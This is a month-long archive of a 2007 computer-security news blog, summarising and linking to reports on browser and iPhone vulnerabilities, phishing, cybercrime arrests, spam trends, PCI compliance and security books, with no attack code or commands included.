Tuesday, July 31, 2007

Firefox URI Handling Bug

Independent security researcher Billy Rios has uncovered a bug in Firefox. Details are in his blog. The bug involves the way Firefox handles URIs and could lead to remote command execution.

What's interesting is that this affects users who also have IE7 -- with the latest security patches -- installed on their system.

The story was also reported on SearchSecurity and SC magazine, which also ran a follow up article the next day. Alerts were posted by Secunia and CERT.

On a side note, the Rios blog is really interesting and worth a visit in itself. Rios writes about web, browser and application security.

Thursday, July 26, 2007

Exploiting Browser History With CSS

This is a new one. The Giant Geek blog had details of an exploit against the browser history using CSS. Yes, innocent CSS as an attack vector.

Sample code are in the post.

But all isn't lost. Countermeasures with links to Firefox extensions are also posted.

DNS Security Issues

A compromised DNS server is worse than a phishing site. It can redirect legitimate traffic undetected to a malicious web site hosting malware without the bother of having to set up the phishing site.

DNS users were warned this week to patch a hole in BIND 9.

The Debate Over NAC

This is an interesting take on the debate over Network Access Control. Some have said it's dying. Others say it has yet to bloom.

But, in the end, NAC is a set of technologies, not a single tool, according to the article, and is still evolving.

Checking for Patches and Zombies

Secunia recently came out with a beta-version of its PSI tool for checking the software on your computer to see if it's up-to-date with latest patches. Details were in Computer World this week.

Computer World also ran an interesting article with a list of tools to check if your machine has been compromised as a zombie.

Mozilla No Better Than IE

Mozilla came clean this week with an admission that it's Firefox web browser is just as flawed as Internet Explorer. Details were in Computer World this week.

Mozilla has an active blog about its security and another site, Bugzilla, for reporting and cataloging bugs.

Handling the Press During Incidents

CSO magazine ran an interesting piece recently about how to deal with the media during an incident.

Since a big part of handling incidents is also handling the publicity -- usually negative -- this could come in handy.

Incident response is more than just stopping intruders to systems. It's also about team work within the company, and that, of course, is about people skills not just technology.

Monday, July 23, 2007

Workplace Privacy and How to Protect It

This article in Computer World covers the basics of what companies can do to watch what employees do online and on their workstations.

It also has links to a long list of products for both conducting surveillance and protecting against it.

iPhone Exploit: Fix It or See It At Black Hat

A group of security researchers have found a flaw in the iPhone that allows remote access to the device and the theft of its credentials.

The researchers from Independent Security Evaluators have given Apple two weeks to fix the exploit or they'll present it at Black Hat next week in Las Vegas.

They've released a paper with details on their web site and posted a video on YouTube.

Sunday, July 22, 2007

The Economist on White Hat Hackers

The Economist ran a fascinating story in this week's issue about white hat hackers and the market for vulnerabilities.

It was well-researched and went into depth about how the market works.

The Economist has run a few good stories in the past year about computer security.

More on Privacy: Google's Cookies and Your Cell Phone

Your cell phone may be spying on you, according to this Computer World report about various types of spyware that can be planted on your cell phone.

Google, the subject of a recent study slamming its privacy practices, came under criticism again this week about its cookie expiration policies.

Chinese Internet Censors Cause E-Mail Chaos

This should come as no surprise to anyone who watches Internet censorship around the world. Chinese censors tied up e-mail last week while adjusting their surveillance system.

I've had a number of other posts on the subject.

Hackers Taking Advantage of Brazil Air Crash

If this isn't the lowest of the low, I don't know what is.

Computer World and Information Week reported how spammers and hackers were taking advantage of Brazil's tragic air crash last week to push malware and spam.

Physical Security and e-Dumpster Diving

Physical security is the easiest part of IT security to overlook. And that makes sense. It isn't very sexy, and it isn't very technical -- on the surface. It's about locks and keys, secured rooms and video cameras, not firewall settings, secure application code, encryption or authentication.

Interestingly enough, in some places the two are slowly merging. Look at biometrics or HSPD-12, a US government initiative to require Smart Cards for both physical access to federal facilities and logical access to its computers.

CSO magazine ran an interesting piece last month about physical security at Starbucks and Computer World had an equally interesting article about dumpster divers now looking for old computer equipment with data. It used to be that dumpster divers just looked for plain old paper trash to steal information.

I also made this point in Chapter 5 of my book, The Little Black Book of Computer Security.

My Article on PCI and Tokenization

I wrote a brief tip last week for SearchSecurity on the benefits of tokenization for PCI compliance.

Tokenization replaces a credit card number with a token in an electronic transaction. By hiding the real card number, it makes a merchant PCI compliant without having to go through the expense of upgrading their point of sale (POS) equipment with costly encryption systems.

Wednesday, July 18, 2007

Top Cybercrime Countries

This news is a bit dated since its about a Symantec report from a few weeks ago. But MSNBC ran a nice story two days ago about the top countries for cybercrime.

It has some good links to articles and a cybercrime atlas in Forbes.

Tuesday, July 17, 2007

Boeing Cybersecurity Can't Get Off The Ground

Italians Arrest 26 for Phishing Attack

Italian authorities arrested 26 people accused of running a phishing scam. Details are in Computer World and the Guardia di Finanza web site in Italian.

I was in Italy in May and posted from there about the Guardia di Finanza.

La Guardia di Finanza ha arrestado 26 persone per l'attivita di phishing delle e-mail truffa. Detagli in italiano sono nel sito di Guardia di Finanza.

Sono stato in Italia in Maggio e ho escrito sulla Guardia di Finanza.

Two Interesting Hacks

This is a fascinating story about the Athens Affair, one of the most daring break-ins to a cell phone network. This story was also on Digg.

This is a lot less spectacular hack for breaking into pay web sites for free.

Insider Threat Now Biggest Concern

According to Information Week's 10th annual Global Information Security survey, conducted with Accenture, employees are the biggest threat to a company's network.

Employees leak information through e-mail, IM and peer-to-peer networks.

I had a blog post on insider profiling in May based on my TechTarget article the same day.

A Mac Bug -- Is That Possible?

Maybe, according to the Information Security Sell Out blog, which claims to have written an exploit in a few hours for a bug just fixed in May.

More details are in this article in Computer World, which has links to the sad saga of Apple exploits over the past few months.

More Random Thoughs on iPhone Security

The good news is that hackers have been unable to unlock the iPhone. And, oh, are they trying. But it's the bootloader signed with a 1,024-bit RSA private key that's stopping them.

But then, there's the web dialer on its Safari web browser. A bug uncovered by SPI Dynamics could allow someone to track phone calls made through the browser. The issue was reported in SPI's blog, Errata Security and in The Register. There's also a Wiki devoted to the subject.

Apparently, there's also ways to get a user's e-mail and track other web activity.

And this is just the beginning. How many weeks has the iPhone been out already?

Israeli Military Program Spawns Startups

It's not immediately obvious until you meet them at trade shows and on sales calls, but Israelis head a lot of IT security startups.

Besides their obvious expertise in military and physical security, Israelis are also very hi-tech.

Here's part of the reason why. It's a program called Talpiot, which was recently profiled in The Wall Street Journal. There's more information on Wikipedia and Doug Henwood's blog.

Saturday, July 14, 2007

Jihad Moves to the Internet

The Economist in this week's issue had a fascinating briefing about jihad online. It followed the trail of a cyberjihadist who devoted all his energies to spreading his cause on the web rather than on the battlefield.

The article gave a good overview of the extent of the issue. Despite the anonymity of the Internet, making it a fertile ground for publicity-shy terrorist organizers, it has some weaknesses in this area too.

The Internet served mostly as an organizing and indoctrination tool, the article said, and wasn't a replacement for live activity on the ground.

Unrelated to the Economist article, an electronic jihad site was taken down about two weeks ago by authorities.

Friday, July 13, 2007

Spike in PDF Spam

An Israeli security firm reported a spike in PDF spam earlier this week. This type of spam is a form of image spam where the unsolicited message is embedded in an image sent by e-mail. Traditional spam filters only see an image, not the spam message, and often allow the e-mail through.

This technique has only been seen in the past few weeks, according to the security firm, and is now being distributed by computers in 167 countries.

The discovery is interesting in light of the fact that a recent report by Symantec claims image spam has been declining. Not so, says MessageLabs, another e-mail security vendor.

My Java Security Article on SearchSecurity

My article on Java Security came out yesterday on SearchSecurity.

There are some interesting links on buffer overflows, XSS and other application-level attacks.

Wednesday, July 11, 2007

A Security Professional's Toolbox

Here's a nice list of what should be in every security professional's toolkit.

Another great list, of course, is the old standby from Insecure.Org.

Tuesday, July 10, 2007

The Debate on Cyberterrorism Goes On

This might sound like beating a dead horse, but Information Week had an article last week summarizing the key points of the it-is-or-it-isn't-cyberterrorism debate.

The article discussed recent incidents including those in Russia and the Electronic Jihad web site.

Six Month Report Card on Vista Security

As a follow up to a report he had done six months ago, Jeff Jones recently released a report showing that security for Microsoft Vista was continuing to improve.

Jones reported the results in a post on a CSO blog. There was a link to the full report.

Jones works for Microsoft and admitted that he wasn't an unbiased observer. The results are interesting, nonetheless, since he compares them with Linux and other platforms.

It's still worth the read.

Cybercrime Police Blotter

The cybercrime beat never stops. Two more were broken up this week, according to reports in both the mainstream and trade press.

One involved a classic stock scam that has been making the rounds lately.

The other was a four-member gang caught with 200,000 credit card numbers.

Monday, July 09, 2007

Plug-And-Play Phishing Kit

This is an unwelcome development in the world of phishing, a plug-and-play phishing kit that can be installed in seconds.

No muss, no fuss for the neophyte phisher looking to break into the big time.

The kit was discovered by RSA during a forensics investigation into a phishing attack.

Not All Data Breaches End in ID Theft

A report last week by the General Accounting Office (GAO) said that large scale data breaches don't always result in equally large-scale cases of identity theft.

The report said that wide-ranging data breach notification laws could put a strain on businesses and result in a Chicken Little-like scenario where the sky was falling for every breach, even small ones.

The point is well-taken, since the bulk of identity theft is still physical, coming from theft of wallets and documents in offices. But it doesn't absolve companies from absolving responsibly in handling customer data, or notifying individuals when their data has been compromised, in some cases.

Alan Paller of SANS told Computer World that he agreed with the report's findings and that lawmakers need to focus on attack-based defenses rather than data breach notification.

The story was also reported on CNET.

Electronic Jihad Site Taken Down

This is an interesting twist on cyberterrorism. The Al-jinan web site, taken down last week by law enforcement authorities, allowed users to download an application, complete with a Windows GUI, for conducting Denial of Service (DoS) attacks against web sites perceived to be anti-Islamic.

The site was up for over four years. Although it was hosted here in the US, the domain was registered in Beirut, keeping control of the site outside the long arm of US authorities.

Tech Experts on ID Theft Protection

Market Watch had this piece with interviews of security experts on how they protect themselves from identity theft.

But the most interesting of the bunch was Frank Abagnale, the infamous con man who was the subject of the film Catch Me If You Can.

iPhone Security Hype

Here's some interesting thoughts on iPhone security. Jim Damoulakis says in Computer World that personal devices have already penetrated the corporate network. From that perspective, the iPhone isn't anything new. On the other hand, he says that if your iPhone is more secure than your laptop, then you've bigger security problems than just the iPhone.

Another Computer World article on iPhone security notes that Apple hasn't released a development kit yet for the phone. The article says this raises the bar for hackers, who must take the phone apart and use specialized tools to break into it. In other words, physical hacking takes more work than software exploits, according to the article.

China Tops in Malware

This is an interesting article from InfoWorld last week about malware statistics.

It noted that China is the world's largest source of malware, at 40 percent of malware generated worldwide, double the rate of 21 percent it held in May.

The article said that a good chunk of software used in China is pirated, making it an attractive target for malware.

Security Consultant on Web 2.0 Hacking

Larry Greenemeier of Information Week had a real thought-provoking post last week on his security blog about hacking Web 2.0 web sites.

He cited five web services that could be targeted by hackers from a post on the GNUCITIZEN blog.

SearchSMB Piece on PCI Compliance for SMBs

This article on PCI compliance for SMBs came out today in SearchSMB.

The angle is a little different than other articles, including mine, on PCI compliance. Instead of going through each of the standard's 12 points and detailing how to meet each one, I only dealt with a few points I thought would be important to an SMB.

More Security Videos

Here's some new security videos from Security Freak. The videos cover basic skills required for anyone in the IT security field about using hacking and security tools for pen and vulnerability testing, among other things.

Last month, I posted links to a nice series of security awareness videos and another about wireless security from Chris Pirillo.

Kabay's Annual INFOSEC Now Online

Prof. Mich Kabay in his Security Strategies column in Network World announced last week that his annual guide, INFOSEC, was now online.

This fantastic and in-depth resource is compiled annually by Prof. Kabay.

Sunday, July 08, 2007

Dangers of Third-Party Access

Here's something I wrote for SearchSecurity about the dangers of granting third-party access to your systems.

This was adapted from one of my recent Ask The Expert questions.

A lot of this is plain common sense.

Monday, July 02, 2007

Timing Isn't Everything to Hackers

Contrary to popular belief, hackers don't hold out until right after Patch Tuesday to release their most potent exploits. Saying hackers are skilled, but still not bright enough to stockpile exploits, Craig Shmugar at McAfee told Computer World last week.

Interestingly, Ira Winkler, in a new book, doesn't give criminals much credit either in the brains department.

Harry Potter Bitten By Worm

Harry Potter fans need to watch out for a malicious worm hiding in an e-mail purporting to contain the final installment of the famous book series.

Details were provided by Sophos and the story was reported on Computer World.

Sunday, July 01, 2007

Webroot Guide to Child Safety Online

Information Week reported about a new guide for parents from Webroot, an anti-malware company, on child safety online.

More details are on Webroot's web site with a link to the guide itself.

Bots on MySpace and Trojans in Shockwave

Malware is everywhere. You can't escape it. The old rule that it only sat on porn, gambling and other unsavory sites, doesn't hold true anymore. Anyone can get in from regular surfing on straight and normal web sites.

Here's two reports about bots on MySpace and Trojans in Shockwave.

Along the same lines, this is a story in eWeek about research by Dr. James Blascovich about the psychology of clicking on links, and why even tech-savvy people can get hooked.

Malware is even in greeting cards, according to this Computer World article.

The lesson to be learned, I guess, is to just stop surfing the web, at all. But definitely don't open any greeting cards. They might be rigged.

Bloggers a Danger on Corporate Laptops

Here's an article from Microsoft Certified Professional online about how blogging from company laptops is a security risk. Russ Cooper references another article on SearchSecurity on the same subject.

What they're saying is that criminals and data thieves use data mining tools to piece together random bits of information posted on blogs. In some cases, employees blogging from their laptops may inadvertently leak bits and pieces of stuff that can be tied together.

Laptops in general have a spotty security record in many companies. I wrote about some tips for laptop security recently for SearchSMB.

New Ankit Fadia Book and Hacker Disassembling

I saw a copy this week of Ankit Fadia's new book, Intrusion Alert: An Ethical Hacking Guide to Intrusion Detection, at Borders and picked it up.

As is the case with Fadia's two previous books, they're basic introductions to hacking and computer security. Both of his two previous books have come out in second edition: The Unofficial Guide to Ethical Hacking and Network Security: A Hacker's Perspective.

Another book on reverse engineering code, Hacker Disassembling, also just came out in its second edition.
The book goes into detail about using debuggers and other tools for decompiling code. It has some new sections on Linux and a CD.